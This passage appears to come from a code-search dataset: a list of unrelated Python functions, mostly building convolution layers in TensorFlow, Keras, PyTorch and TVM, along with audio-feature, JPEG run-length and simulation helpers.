data[:, INDEX_OF_ENERGY]\n if firstOrder:\n length = length[data[:, INDEX_OF_DEPTH] == 0]\n energy = energy[data[:, INDEX_OF_DEPTH] == 0]\n print('convolveUsingTime 1st energy', energy.sum())\n # print('convolveUsingTime')\n # print(length)\n\n d = np.array([length, energy]).T\n\n # accumulate the energy, assign to variable `f`\n l = 2 * (altitude - height) / C * 1e9\n r = 2 * (altitude + height) / C * 1e9\n for i in d:\n if not l <= i[0] <= r:\n continue\n # idx = np.searchsorted(bins, i[0]) - 1 # lower bound better\n # idx, ansr = searchRange(bins, i[0])\n idx = lower_bound(bins, i[0]) - 1\n f[idx] += i[1]\n\n # convolve\n n = 5 # hard code\n x = np.linspace(-3, 3, 2 * n + 1)\n pulse = np.exp(-x * x / 2)\n pulse = pulse / np.sum(pulse)\n\n pulse = np.array([0.003088973, 0.01469372, 0.04942357, 0.1175497, 0.1976943, 0.2350995, 0.1976943, 0.1175497, 0.04942357, 0.01469372, 0.003088973])\n\n res = np.convolve(f, pulse, 'same')\n # ans = np.array([bins - 2 * altitude / const.LIGHT_SPEED * 1e9 + 0.5, res]).T\n ans = np.array([times, res]).T\n\n [dirname, name] = os.path.split(out)\n\n np.savetxt(dirname + '/accum/accum-' + name, np.array([bins - 2 * altitude / const.LIGHT_SPEED * 1e9 + 0.5, f]).T)\n np.savetxt(dirname + '/accum/accum-' + name, np.array([times, f]).T)\n np.savetxt(out, ans)\n return ans", "def convolve(x, attn):\n stacked = torch.stack([pad_shift(x, i) for\n i in range(attn.shape[2])], dim=-1)\n return torch.sum(attn.unsqueeze(2) * stacked, dim=-1)", "def _conv_block(inputs, filters, kernel=(3, 3), strides=(1, 1), alpha=1.0, nl='RE'):\n channel_axis = 1 if K.image_data_format() == 'channels_first' else -1\n filters = int(filters * alpha)\n x = KL.Conv2D(filters, kernel, padding='same', use_bias=False, strides=strides)(inputs)\n x = KL.BatchNormalization(axis=channel_axis)(x)\n return _return_activation(x, nl=nl)", "def convnet_layers( inputs, widths, mode ):\n\n training = (mode == \"train\")\n \n with tf.variable_scope( \"convnet\" ): # h,w\n \n #print(inputs.shape)\n x = conv_layer( inputs, layer_params[0], training ) \n #print(x.shape)\n x = conv_layer( x, layer_params[1], training ) \n #print(x.shape)\n x = pool_layer( x, 2, 'valid', 'pool2' )\n #print(x.shape)\n x = conv_layer( x, layer_params[2], training ) \n x = conv_layer( x, layer_params[3], training )\n #print(x.shape)\n x = pool_layer( x, 2, 'valid', 'pool4' )\n #print(x.shape)\n x = conv_layer( x, layer_params[4], training ) \n x = conv_layer( x, layer_params[5], training )\n #print(x.shape)\n x = pool_layer( x, 2, 'valid', 'pool6') \n #print(x.shape)\n x = conv_layer( x, layer_params[6], training ) \n x = conv_layer( x, layer_params[7], training )\n \n x = tf.layers.max_pooling2d( x, [2, 1], [2, 1], \n padding='valid', \n name='pool8' ) \n\n #print(x.shape)\n\n # squeeze row dim\n x = tf.squeeze( x, axis=1, name='features' )\n\n #print(x.shape)\n\n sequence_length = get_sequence_lengths( widths ) \n\n return x, sequence_length", "def calcfeat_delta_delta(signal, samplerate=16000, win_length=0.025, win_step=0.01, filters_num=26, NFFT=512,\n\t\t\t\t\t\t low_freq=0, high_freq=None, pre_emphasis_coeff=0.97, cep_lifter=22, appendEnergy=True,\n\t\t\t\t\t\t mode='mfcc', feature_len=13):\n\tfilters_num = 2 * feature_len\n\tfeat = calcMFCC(signal, samplerate, win_length, win_step, feature_len, filters_num, NFFT, low_freq, high_freq,\n\t\t\t\t\tpre_emphasis_coeff, cep_lifter, appendEnergy, mode=mode) # 首先获取13个一般MFCC系数\n\tfeat_delta = delta(feat)\n\tfeat_delta_delta = delta(feat_delta)\n\n\tresult = numpy.concatenate((feat, 
feat_delta, feat_delta_delta), axis=1)\n\treturn result", "def get_length(data):\n return np.array([len(conv) for conv in data]).reshape(-1, 1)", "def schedule_conv2d_NCHWc(num_filter, kernel_size, stride, padding, outs):\n s = tvm.create_schedule([x.op for x in outs])\n\n def traverse(op):\n \"\"\"Traverse operators from computation graph\"\"\"\n # inline all one-to-one-mapping operators except the last stage (output)\n if tag.is_broadcast(op.tag):\n if op not in s.outputs:\n s[op].compute_inline()\n for tensor in op.input_tensors:\n if tensor.op.input_tensors:\n traverse(tensor.op)\n\n if 'conv2d_NCHWc' in op.tag:\n conv_out = op.output(0)\n kernel = conv_out.op.input_tensors[1]\n data_vec = conv_out.op.input_tensors[0]\n data = data_vec.op.input_tensors[0] \\\n if isinstance(data_vec.op, tvm.tensor.ComputeOp) and \"pad\" not in data_vec.op.tag \\\n else data_vec\n if isinstance(data.op, tvm.tensor.ComputeOp) and \"pad\" in data.op.tag:\n data_pad = data\n data = data_pad.op.input_tensors[0]\n\n n, ic_chunk, h, w, ic_block = [x.value for x in data.shape]\n ic = ic_chunk * ic_block\n original_data = tvm.placeholder((n, ic, h, w), dtype=conv_out.dtype)\n\n kh, kw = kernel_size\n original_kernel = tvm.placeholder((num_filter, ic, kh, kw), dtype=conv_out.dtype)\n\n wkl = _get_workload(original_data, original_kernel, stride, padding, conv_out.dtype)\n sch = _get_schedule(wkl)\n _SCH_TO_SCH_FUNC[type(sch)](s, wkl, data_vec,\n kernel, conv_out, outs[0])\n\n traverse(outs[0].op)\n return s", "def conv(self,\n x,\n k_h,\n k_w,\n c_o,\n s_h,\n s_w,\n name,\n relu,\n group=1,\n bias_term=False,\n padding=\"SAME\",\n trainable=True):\n with tf.name_scope(name), tf.variable_scope(name):\n # Get the input channel\n c_i = x.get_shape()[-1]/group\n # Create the weights, with shape [k_h, k_w, c_i, c_o]\n weights = self.make_cpu_variables(\"weights\", [k_h, k_w, c_i, c_o], trainable=trainable)\n # Create a function for convolution calculation\n def conv2d(i, w):\n return tf.nn.conv2d(i, w, [1, s_h, s_w, 1], padding)\n # If we don't need to divide this convolutional layer\n if group == 1:\n outputs = conv2d(x, weights)\n # If we need to divide this convolutional layer\n else:\n # Split the input and weights\n group_inputs = tf.split(x, group, 3, name=\"split_inputs\")\n group_weights = tf.split(weights, group, 3, name=\"split_weights\")\n group_outputs = [conv2d(i, w) for i, w in zip(group_inputs, group_weights)]\n # Concatenate the groups\n outputs = tf.concat(group_outputs, 3)\n if bias_term:\n # Create the biases, with shape [c_o]\n biases = self.make_cpu_variables(\"biases\", [c_o], trainable=trainable)\n # Add the biases\n outputs = tf.nn.bias_add(outputs, biases)\n if relu:\n # Nonlinear process\n outputs = tf.nn.relu(outputs)\n # Return layer's output\n return outputs", "def TCN_V2(\n n_classes, \n feat_dim,\n max_len,\n gap=1,\n dropout=0.0,\n activation=\"relu\"):\n\n ROW_AXIS = 1\n CHANNEL_AXIS = 2\n \n initial_conv_len = 8\n initial_conv_num = 64\n\n config = [ \n [(1,8,64)],\n [(1,8,64)],\n [(1,8,64)],\n [(1,8,64)],\n [(1,8,64)],\n [(2,8,128)],\n [(1,8,128)],\n [(1,8,128)],\n [(1,8,128)],\n [(1,8,128)],\n ]\n\n input = Input(shape=(max_len,feat_dim))\n model = input\n\n model = Convolution1D(initial_conv_num, \n initial_conv_len,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=1)(model)\n\n for depth in range(0,len(config)):\n blocks = []\n for stride,filter_dim,num in config[depth]:\n ## residual block\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n relu = 
Activation(activation)(bn)\n dr = Dropout(dropout)(relu)\n conv = Convolution1D(num, \n filter_dim,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=stride)(dr)\n #dr = Dropout(dropout)(conv)\n\n\n ## potential downsample\n conv_shape = K.int_shape(conv)\n model_shape = K.int_shape(model)\n if conv_shape[CHANNEL_AXIS] != model_shape[CHANNEL_AXIS]:\n model = Convolution1D(num, \n 1,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=2)(model)\n\n ## merge block\n model = merge([model,conv],mode='sum',concat_axis=CHANNEL_AXIS)\n\n ## final bn+relu\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n model = Activation(activation)(bn)\n\n\n if gap:\n pool_window_shape = K.int_shape(model)\n gap = AveragePooling1D(pool_window_shape[ROW_AXIS],\n stride=1)(model)\n flatten = Flatten()(gap)\n else:\n flatten = Flatten()(model)\n\n dense = Dense(output_dim=n_classes,\n init=\"he_normal\",\n activation=\"softmax\")(flatten)\n\n model = Model(input=input, output=dense)\n # optimizer = SGD(lr=0.01, momentum=0.9, decay=0.0, nesterov=True) \n # model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])\n return model", "def _build_conv_layer_params(self, input_shape):\n conv_layer_params = []\n if self._conv_type == '3d':\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[self._kernel_size] * 3,\n strides=self._strides,\n dilation_rate=self._rates,\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n elif self._conv_type == '2d':\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[1, self._kernel_size, self._kernel_size],\n strides=[1, self._strides[1], self._strides[2]],\n dilation_rate=[1, self._rates[1], self._rates[2]],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n elif self._conv_type == '1+2d':\n channels_in = input_shape[self._channel_axis]\n conv_layer_params.append(\n dict(\n filters=channels_in,\n kernel_size=[self._kernel_size, 1, 1],\n strides=[self._strides[0], 1, 1],\n dilation_rate=[self._rates[0], 1, 1],\n kernel_initializer=tf_utils.clone_initializer(\n self._temporal_conv_initializer),\n ))\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[1, self._kernel_size, self._kernel_size],\n strides=[1, self._strides[1], self._strides[2]],\n dilation_rate=[1, self._rates[1], self._rates[2]],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n elif self._conv_type == '2+1d':\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[1, self._kernel_size, self._kernel_size],\n strides=[1, self._strides[1], self._strides[2]],\n dilation_rate=[1, self._rates[1], self._rates[2]],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[self._kernel_size, 1, 1],\n strides=[self._strides[0], 1, 1],\n dilation_rate=[self._rates[0], 1, 1],\n kernel_initializer=tf_utils.clone_initializer(\n self._temporal_conv_initializer),\n ))\n elif self._conv_type == '1+1+1d':\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[1, 1, self._kernel_size],\n strides=[1, 1, self._strides[2]],\n dilation_rate=[1, 1, self._rates[2]],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[1, self._kernel_size, 1],\n strides=[1, 
self._strides[1], 1],\n dilation_rate=[1, self._rates[1], 1],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n conv_layer_params.append(\n dict(\n filters=self._filters,\n kernel_size=[self._kernel_size, 1, 1],\n strides=[self._strides[0], 1, 1],\n dilation_rate=[self._rates[0], 1, 1],\n kernel_initializer=tf_utils.clone_initializer(\n self._kernel_initializer),\n ))\n else:\n raise ValueError('Unsupported conv_type: {}'.format(self._conv_type))\n return conv_layer_params", "def conv_block(input, filters, phase=phase):\r\n\r\n conv_block = tf.layers.conv2d(\r\n inputs=input,\r\n filters=filters,\r\n kernel_size=3,\r\n padding=\"SAME\",\r\n activation=tf.nn.relu)\r\n\r\n #conv_block = tf.contrib.layers.batch_norm(\r\n # conv_block, \r\n # center=True, scale=True, \r\n # is_training=phase)\r\n\r\n #conv_block = tf.nn.leaky_relu(\r\n # features=conv_block,\r\n # alpha=0.2)\r\n #conv_block = tf.nn.relu(conv_block)\r\n\r\n return conv_block", "def conv(c_in, c_out, k_size, stride=2, pad=1, bn=True):\n layers = []\n layers.append(nn.Conv2d(c_in, c_out, k_size, stride, pad, bias=True)) # bias=False\n if bn:\n layers.append(nn.BatchNorm2d(c_out))\n return nn.Sequential(*layers)", "def time_conv_reshape(arr,window,stride):\n \n bat, steps, feat = arr.get_shape().as_list()\n r = tf.floormod((steps - window), stride)\n n = math.ceil((steps - window)/stride)\n \n def padder(n=n,r=r,feat=feat,steps=steps,bat=bat,arr=arr):\n \"\"\"Pad function.\"\"\"\n pad = tf.zeros([bat, stride - r, feat],tf.float32)\n return tf.concat([arr, pad], 1) \n \n arr = tf.cond(tf.equal(r,0), lambda: arr, padder)\n steps = tf.cond(tf.equal(r,0), lambda: steps, lambda: steps + stride -r)\n last_step = steps - window + 1 \n \n def c(i,a,b):\n \"\"\"Condition tf.while_loop\"\"\"\n return tf.less(i,window)\n \n def b(i,new_arr,arr):\n \"\"\"Body tf.while_loop. 
Appends ith value of windows to new_arr.\"\"\"\n new_arr = tf.concat([new_arr,arr[:, i:last_step + i:stride, :]], axis=2)\n return i+1,new_arr,arr\n \n i = tf.constant(1)\n new_arr = arr[:, 0: last_step: stride, :]\n new_arr.set_shape([bat,n+1,None])\n _,new_arr,_=tf.while_loop(c,\n b,\n loop_vars=[i,new_arr,arr],\n shape_invariants=[i.get_shape(),\n tf.TensorShape([bat,n+1,None]),\n arr.get_shape(),\n ],\n )\n new_arr.set_shape([bat,n+1,feat*window])\n return new_arr", "def runlength(block, color_component, prev_dc_0, prev_dc_1, prev_dc_2):\n output = []\n accumulator = []\n flag = 0\n zero_count = 0\n\n for i in range(64):\n if i == 0:\n if (color_component == 1) or (color_component == 0):\n accumulator.append(block[i] - prev_dc_0)\n output.append(0)\n prev_dc_0 = block[i]\n\n elif color_component == 2:\n accumulator.append(block[i] - prev_dc_1)\n output.append(0)\n prev_dc_1 = block[i]\n\n elif color_component == 3:\n accumulator.append(block[i] - prev_dc_2)\n output.append(0)\n prev_dc_2 = block[i]\n else:\n pass\n else:\n if block[i] == 0:\n zero_count = zero_count + 1\n else:\n if zero_count <= 15:\n output.append(zero_count)\n accumulator.append(block[i])\n zero_count = 0\n else:\n accumulator.append(0)\n output.append(15)\n data = block[i]\n zero_count = zero_count - 15\n flag = 1\n\n while flag == 1:\n if zero_count <= 15:\n accumulator.append(data)\n output.append(zero_count)\n zero_count = 0\n flag = 0\n else:\n accumulator.append(0)\n output.append(15)\n zero_count = zero_count - 15\n\n if i == 63:\n if zero_count != 0:\n accumulator.append(0)\n output.append(0)\n\n return (output, accumulator, prev_dc_0, prev_dc_1, prev_dc_2)", "def conv_block(\r\n in_channels,\r\n out_channels,\r\n kernel_size,\r\n stride,\r\n dilation=1,\r\n):\r\n pad_mode = 'same'\r\n padding = 0\r\n\r\n dbl = nn.SequentialCell(\r\n [\r\n nn.Conv2d(\r\n in_channels,\r\n out_channels,\r\n kernel_size=kernel_size,\r\n stride=stride,\r\n padding=padding,\r\n dilation=dilation,\r\n pad_mode=pad_mode,\r\n ),\r\n nn.BatchNorm2d(out_channels, momentum=0.1),\r\n nn.ReLU(),\r\n ]\r\n )\r\n init_cov(dbl[0])\r\n init_bn(dbl[1])\r\n return dbl", "def conv(n_inputs, n_filters, kernel_size=3, stride=1, bias=False) -> torch.nn.Conv2d:\n return nn.Conv2d(n_inputs, n_filters,\n kernel_size=kernel_size, stride=stride,\n padding=kernel_size//2, bias=bias)", "def _compute_carry_and_output(self, x, h_tm1, c_tm1):\n x_i, x_f, x_c, x_o = x\n h_tm1_i, h_tm1_f, h_tm1_c, h_tm1_o = h_tm1\n i = self.recurrent_activation(\n x_i + K.dot(h_tm1_i, self.recurrent_kernel[:, :self.units]))\n f = self.recurrent_activation(x_f + K.dot(\n h_tm1_f, self.recurrent_kernel[:, self.units:self.units * 2]))\n c = f * c_tm1 + i * self.activation(x_c + K.dot(\n h_tm1_c, self.recurrent_kernel[:, self.units * 2:self.units * 3]))\n o = self.recurrent_activation(\n x_o + K.dot(h_tm1_o, self.recurrent_kernel[:, self.units * 3:]))\n return c, o", "def conv2d(x, *args, **kwargs):\n i = 0\n out = []\n batch_size = 10000\n while i < x.size(0): \n out.append(F.conv2d(x[i:min(i+batch_size, x.size(0))], *args, **kwargs))\n i += batch_size\n return torch.cat(out, 0)", "def forward(self, x):\n conv_output = self.conv1(x)\n\n # The window size of max pooling layer of CNN depends on the dimension of conv1d output.\n # Since padding size is 1 and kernal size is 5, so the output of conv1d is with dimension\n # length_of_input_sequence - 2 + 5 - 1 = length_of_input_sequence - 2\n x_conv = F.max_pool1d(F.relu(conv_output), x.size()[-1] - 2)\n return x_conv", "def 
calculate_timestep(self, control_inputs):\r\n rcs_disp = [0, 0]\r\n if control_inputs[4]:\r\n if control_inputs[0]: rcs_disp[0] += 1\r\n if control_inputs[1]: rcs_disp[0] -= 1\r\n if control_inputs[2]: rcs_disp[1] += 1\r\n if control_inputs[3]: rcs_disp[1] -= 1\r\n else:\r\n if control_inputs[0]:\r\n self.delta_v += self.accel*0.1\r\n self.thrust_angle = self.heading\r\n if control_inputs[1]:\r\n self.delta_v -= self.accel*0.1\r\n self.thrust_angle = self.heading\r\n if control_inputs[3]: self.delta_omega += self.accel*0.1\r\n if control_inputs[2]: self.delta_omega -= self.accel*0.1\r\n if control_inputs[5]:\r\n self.delta_omega *= 0.5\r\n self.delta_v *= 0.5\r\n if control_inputs[0] == False and control_inputs[1] == False:\r\n self.delta_v = 0\r\n if control_inputs[3] == False and control_inputs[2] == False:\r\n self.delta_omega = 0\r\n \r\n self.vel += self.delta_v\r\n self.omega += self.delta_omega\r\n if self.vel > 5: self.vel = 5\r\n if self.vel < -5: self.vel = -5\r\n if self.omega > 5: self.omega = 5\r\n if self.omega < -5: self.omega = -5\r\n if abs(self.vel) < 0.1: self.vel = 0\r\n if abs(self.omega) < 0.1: self.omega = 0\r\n if control_inputs[6]:\r\n self.vel = self.vel*0.9\r\n self.omega = self.omega*0.9\r\n self.heading += self.omega*self.time_step\r\n self.position[0] += (\r\n self.vel*self.time_step*cos(-radians(self.thrust_angle))\r\n + rcs_disp[0]*cos(-radians(self.heading))\r\n - rcs_disp[1]*sin(-radians(self.heading)))\r\n self.position[1] += (\r\n self.vel*self.time_step*sin(-radians(self.thrust_angle))\r\n + rcs_disp[0]*sin(-radians(self.heading))\r\n -rcs_disp[1]*cos(-radians(self.heading)))\r\n return self.position, self.vel, self.heading, self.omega, self.thrust_angle", "def conv2d_reduce_sum(x, input_height, input_width, padding, strides):\n # Sum over the output channels.\n lam_sum = tf.reduce_sum(x, axis=4)\n\n num_classes = x.shape[0].value\n batch_size = tf.shape(x)[1]\n kernel_height = x.shape[5].value\n kernel_width = x.shape[6].value\n input_channels = x.shape[7].value\n\n # Temporarily combine the (num_classes, batch_size, in_layer_channels) dims\n # while applying a transpose convolution.\n # Also combine (kernel_height, kernel_width), using them as the channels\n # as we'll apply the transpose convolution to each kernel point separately.\n lam_squeezed = tf.transpose(lam_sum, perm=[0, 1, 6, 2, 3, 4, 5])\n lam_squeezed = tf.reshape(lam_squeezed, shape=(\n [num_classes * batch_size * input_channels] +\n x.shape[2:4].as_list() +\n [kernel_height * kernel_width]))\n\n # De-convolve each elementary (i.e. 
one-hot) filter with the corresponding\n # slice of lambda.\n diagonal_kernel = tf.reshape(\n tf.eye(kernel_height * kernel_width, dtype=x.dtype),\n shape=[kernel_height, kernel_width, 1, kernel_height * kernel_width])\n lam_deconv = tf.nn.conv2d_transpose(\n lam_squeezed, diagonal_kernel, output_shape=(\n [num_classes * batch_size * input_channels] +\n [input_height, input_width, 1]),\n padding=padding, strides=([1] + list(strides) + [1]))\n\n # The resulting de-convolution has shape\n # (num_classes*batch_size*in_layer_channels,\n # in_layer_height, in_layer_width, 1).\n # Make it match mu_in.\n result = tf.reshape(lam_deconv, shape=(\n [num_classes, batch_size, input_channels] +\n lam_deconv.shape[1:3].as_list()))\n return tf.transpose(result, perm=[0, 1, 3, 4, 2])", "def get_time_steps(org_input):\n flat_input = nest.flatten(org_input)\n flat_input = tuple(array_ops.transpose(input_, [1, 0, 2])\n for input_ in flat_input)\n input_shape = tuple(array_ops.shape(input_) for input_ in flat_input)\n time_steps = input_shape[0][0]\n\n return time_steps", "def calccfl(k, t, x):\n xstep = (max(x) - min(x)) / (len(x)-1)\n tstep = (max(t) - min(t)) / (len(t)-1)\n cfl = k*tstep/xstep**2\n return cfl", "def conv(self, inputs, filters, kernel_size, strides, padding='SAME', name='conv_layer'):\n input_channels = inputs[-1]\n kernel = tf.Variable(tf.random.truncated_normal(shape=[kernel_size, kernel_size, input_channels, filters]),\n dtype=tf.float32, name='kernel')\n bias = tf.Variable(tf.zeros(shape=[filters]), name='bias')\n conv = tf.nn.conv2d(inputs, filter=kernel,\n strides=[1, strides, strides, 1],\n padding=padding, name='conv')\n out = tf.nn.relu(conv + bias, name='relu')\n return out", "def conv(x, filter_height, filter_width, num_filters, stride_y, stride_x, name,\n padding='SAME', trainable=True, log_weights=False):\n # Get number of input channels\n input_channels = int(x.get_shape()[-1])\n\n # Create lambda function for the convolution\n\n with tf.variable_scope(name) as scope:\n\n regularizer = tf.contrib.layers.l2_regularizer(scale=0.01)\n\n weights = tf.get_variable(name='weights',\n shape=[filter_height, filter_width,\n input_channels, num_filters],\n initializer=tf.glorot_uniform_initializer(),\n regularizer=regularizer,\n trainable=trainable)\n\n biases = tf.get_variable(name='biases',\n shape=[num_filters],\n initializer=tf.zeros_initializer(),\n trainable=trainable)\n\n out = tf.nn.conv2d(x, weights, strides=[1, stride_y, stride_x, 1],\n padding=padding)\n # Add biases\n out = tf.nn.bias_add(out, biases)\n\n # Apply relu function\n out = tf.nn.relu(out, name=scope.name)\n\n if log_weights == True:\n tf.summary.image('weights', weights[tf.newaxis,:,:,0,0,tf.newaxis])\n tf.summary.histogram('weights', weights)\n tf.summary.histogram('biases', biases)\n\n return out, weights, biases", "def conv2d(inputs, filters, kernel_size=3, strides=(1, 1)):\n return tf.layers.conv2d(\n inputs,\n filters,\n kernel_size,\n strides,\n padding=\"same\",\n activation=tf.nn.relu,\n bias_initializer=tf.initializers.constant(0.0),\n kernel_initializer=tf.keras.initializers.glorot_normal(),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(weight_decay))", "def inference_deep_pyramid_cnn(self):\n #1.region embedding\n embedding_documents=self.region_embedding() #shape:[batch_size,total_sequence_length,embedding_size]\n\n #2.two layers of convs\n embedding_documents = tf.expand_dims(embedding_documents ,-1) # [batch_size,total_sequence_length,embed_size,1). 
expand dimension so meet input requirement of 2d-conv\n conv=self.dpcnn_two_layers_conv(embedding_documents,double_num_filters=False) #shape:[batch_size,total_sequence_length,embed_size,hpcnn_number_filters]\n #skip connection: add and activation\n conv=conv+embedding_documents #shape:[batch_size,total_sequence_length,embed_size,hpcnn_number_filters]\n b = tf.get_variable(\"b-inference\", [self.hpcnn_number_filters])\n print(\"conv:\",conv,\";b:\",b)\n conv = tf.nn.relu(tf.nn.bias_add(conv, b),\"relu-inference\") #shape:[batch_size,total_sequence_length,embed_size,hpcnn_number_filters]\n\n #3. repeat of building blocks\n for i in range(self.num_repeat):\n conv=self.dpcnn_pooling_two_conv(conv,i) #shape:[batch_size,total_sequence_length/np.power(2,i),hpcnn_number_filters]\n\n #4. max pooling\n seq_length1=conv.get_shape().as_list()[1] #sequence length after multiple layers of conv and pooling\n seq_length2=conv.get_shape().as_list()[2] #sequence length after multiple layers of conv and pooling\n print(\"before.final.pooling:\",conv)\n pooling=tf.nn.max_pool(conv, ksize=[1,seq_length1,seq_length2,1], strides=[1,1,1,1], padding='VALID',name=\"pool\") #[batch_size,hpcnn_number_filters]\n pooling=tf.squeeze(pooling)\n print(\"pooling.final:\",pooling)\n\n #5. classifier\n\n return pooling", "def _explain_convolution(self, input, epsilon=0.005) -> torch.Tensor:\n model_info = self._derive_conv_info(self.model)\n\n input_conv = self._image_to_column(\n input,\n kernel_h=model_info[\"kernel_h\"],\n kernel_w=model_info[\"kernel_w\"],\n padding=model_info[\"padding\"],\n stride=model_info[\"stride\"],\n )\n\n start_layer_relevance = self._layerwise_relevance_propagation(\n self.model, input_conv, self.model(input)\n )\n\n start_layer_relevance = self._column_to_image(\n start_layer_relevance,\n input.size(),\n kernel_h=model_info[\"kernel_h\"],\n kernel_w=model_info[\"kernel_w\"],\n padding=model_info[\"padding\"],\n stride=model_info[\"stride\"],\n )\n\n return start_layer_relevance", "def _compute_total_covariance_matrix_states_time(self) -> tf.Tensor:\n aux_matrix = tf.matmul(self.b_matrix, tf.matmul(self.omega_matrix,\n self.b_matrix,\n transpose_b=True))\\\n + self.t_matrix\n total_covariance_matrix = self.total_c_phi\\\n + tf.matmul(self.s_matrix_inv,\n tf.matmul(aux_matrix, self.s_matrix_inv))\n return total_covariance_matrix", "def fftdeconvolve(image, kernel):\n x = numpy.fft.fftshift(numpy.fft.fftn(image))\n y = numpy.fft.fftshift(numpy.fft.fftn(kernel))\n\n return numpy.real(numpy.fft.fftshift(\n numpy.fft.ifftn(numpy.fft.ifftshift(x / y))))", "def dpcnn_two_layers_conv(self, inputs,double_num_filters=True):\n # conv1:\n # filter1's first three dimension apply to [total_sequence_length, embed_size, 1] of embedding_documents\n print(\"dpcnn_two_layers_conv.inputs:\", inputs) # (128, 400, 64, 250)\n channel = inputs.get_shape().as_list()[-1]\n if double_num_filters:\n hpcnn_number_filters =channel * 2\n else:\n hpcnn_number_filters=self.hpcnn_number_filters\n filter1 = tf.get_variable(\"filter1-%s\" % self.hpcnn_filter_size,[self.hpcnn_filter_size, 1, channel, hpcnn_number_filters],initializer=self.initializer)\n conv1 = tf.nn.conv2d(inputs, filter1, strides=[1, self.stride_length, 1, 1], padding=\"SAME\",name=\"conv\") # shape:[batch_size,total_sequence_length,embed_size,hpcnn_number_filters]\n conv1 = tf.contrib.layers.batch_norm(conv1, is_training=self.is_training_flag, scope='cnn1')\n\n print(\"dpcnn_two_layers_conv.conv1:\", conv1) # (128, 400, 64, 250)\n b1 = 
tf.get_variable(\"b-cnn-%s\" % hpcnn_number_filters, [hpcnn_number_filters])\n conv1 = tf.nn.relu(tf.nn.bias_add(conv1, b1),\"relu1\") # shape:[batch_size,total_sequence_length,embed_size,hpcnn_number_filters]\n\n # conv2\n # filter2's first three dimension apply to:[total_sequence_length,embed_size,hpcnn_number_filters] of conv1\n filter2 = tf.get_variable(\"filter2-%s\" % self.hpcnn_filter_size,[self.hpcnn_filter_size, 1, hpcnn_number_filters, hpcnn_number_filters],initializer=self.initializer)\n conv2 = tf.nn.conv2d(conv1, filter2, strides=[1, self.stride_length, 1, 1], padding=\"SAME\",name=\"conv2\") # shape:[batch_size,stotal_sequence_length,embed_size,hpcnn_number_filters]\n conv2 = tf.contrib.layers.batch_norm(conv2, is_training=self.is_training_flag, scope='cnn2')\n\n print(\"dpcnn_two_layers_conv.conv2:\", conv2) # (128, 400, 64, 250)\n return conv2 # shape:[batch_size,total_sequence_length,embed_size,num_filters]", "def td_conv_block(input_tensor, kernel_size, filters, stage, block, td_input_shape, strides=(2, 2), use_conv_bias=True,\n weight_regularizer=None, bias_regularizer=None, bn_training=False, separate_scale=False):\n filters1, filters2, filters3 = filters\n bn_axis = 3\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n scale_name_base = 'scale' + str(stage) + block + '_branch'\n eps = 1e-5\n\n x = TimeDistributed(Conv2D(filters1, (1, 1), strides=strides, use_bias=use_conv_bias,\n kernel_regularizer=weight_regularizer, bias_regularizer=bias_regularizer\n ),\n name=conv_name_base + '2a', input_shape=td_input_shape)(input_tensor)\n x = TimeDistributed(BatchNormalization(epsilon=eps, axis=bn_axis, trainable=bn_training),\n name=bn_name_base + '2a')(x, training=bn_training)\n if separate_scale:\n x = TimeDistributed(Scale(axis=bn_axis, trainable=bn_training), name=scale_name_base + '2a')(x, training=bn_training)\n x = Activation('relu')(x)\n\n x = TimeDistributed(Conv2D(filters2, kernel_size, padding='same', use_bias=use_conv_bias,\n kernel_regularizer=weight_regularizer, bias_regularizer=bias_regularizer\n ),\n name=conv_name_base + '2b')(x)\n x = TimeDistributed(BatchNormalization(epsilon=eps, axis=bn_axis, trainable=bn_training),\n name=bn_name_base + '2b')(x, training=bn_training)\n if separate_scale:\n x = TimeDistributed(Scale(axis=bn_axis, trainable=bn_training), name=scale_name_base + '2b')(x, training=bn_training)\n x = Activation('relu')(x)\n\n x = TimeDistributed(Conv2D(filters3, (1, 1), use_bias=use_conv_bias,\n kernel_regularizer=weight_regularizer,bias_regularizer=bias_regularizer\n ),\n name=conv_name_base + '2c')(x)\n x = TimeDistributed(BatchNormalization(epsilon=eps, axis=bn_axis, trainable=bn_training),\n name=bn_name_base + '2c')(x, training=bn_training)\n if separate_scale:\n x = TimeDistributed(Scale(axis=bn_axis, trainable=bn_training), name=scale_name_base + '2c')(x, training=bn_training)\n\n shortcut = TimeDistributed(Conv2D(filters3, (1, 1), strides=strides, use_bias=use_conv_bias,\n kernel_regularizer=weight_regularizer, bias_regularizer=bias_regularizer\n ),\n name=conv_name_base + '1')(input_tensor)\n shortcut = TimeDistributed(BatchNormalization(epsilon=eps, axis=bn_axis, trainable=bn_training),\n name=bn_name_base + '1')(shortcut, training=bn_training)\n if separate_scale:\n shortcut = TimeDistributed(Scale(axis=bn_axis, trainable=bn_training),\n name=scale_name_base + '1')(shortcut, training=bn_training)\n\n x = layers.add([x, shortcut])\n x = 
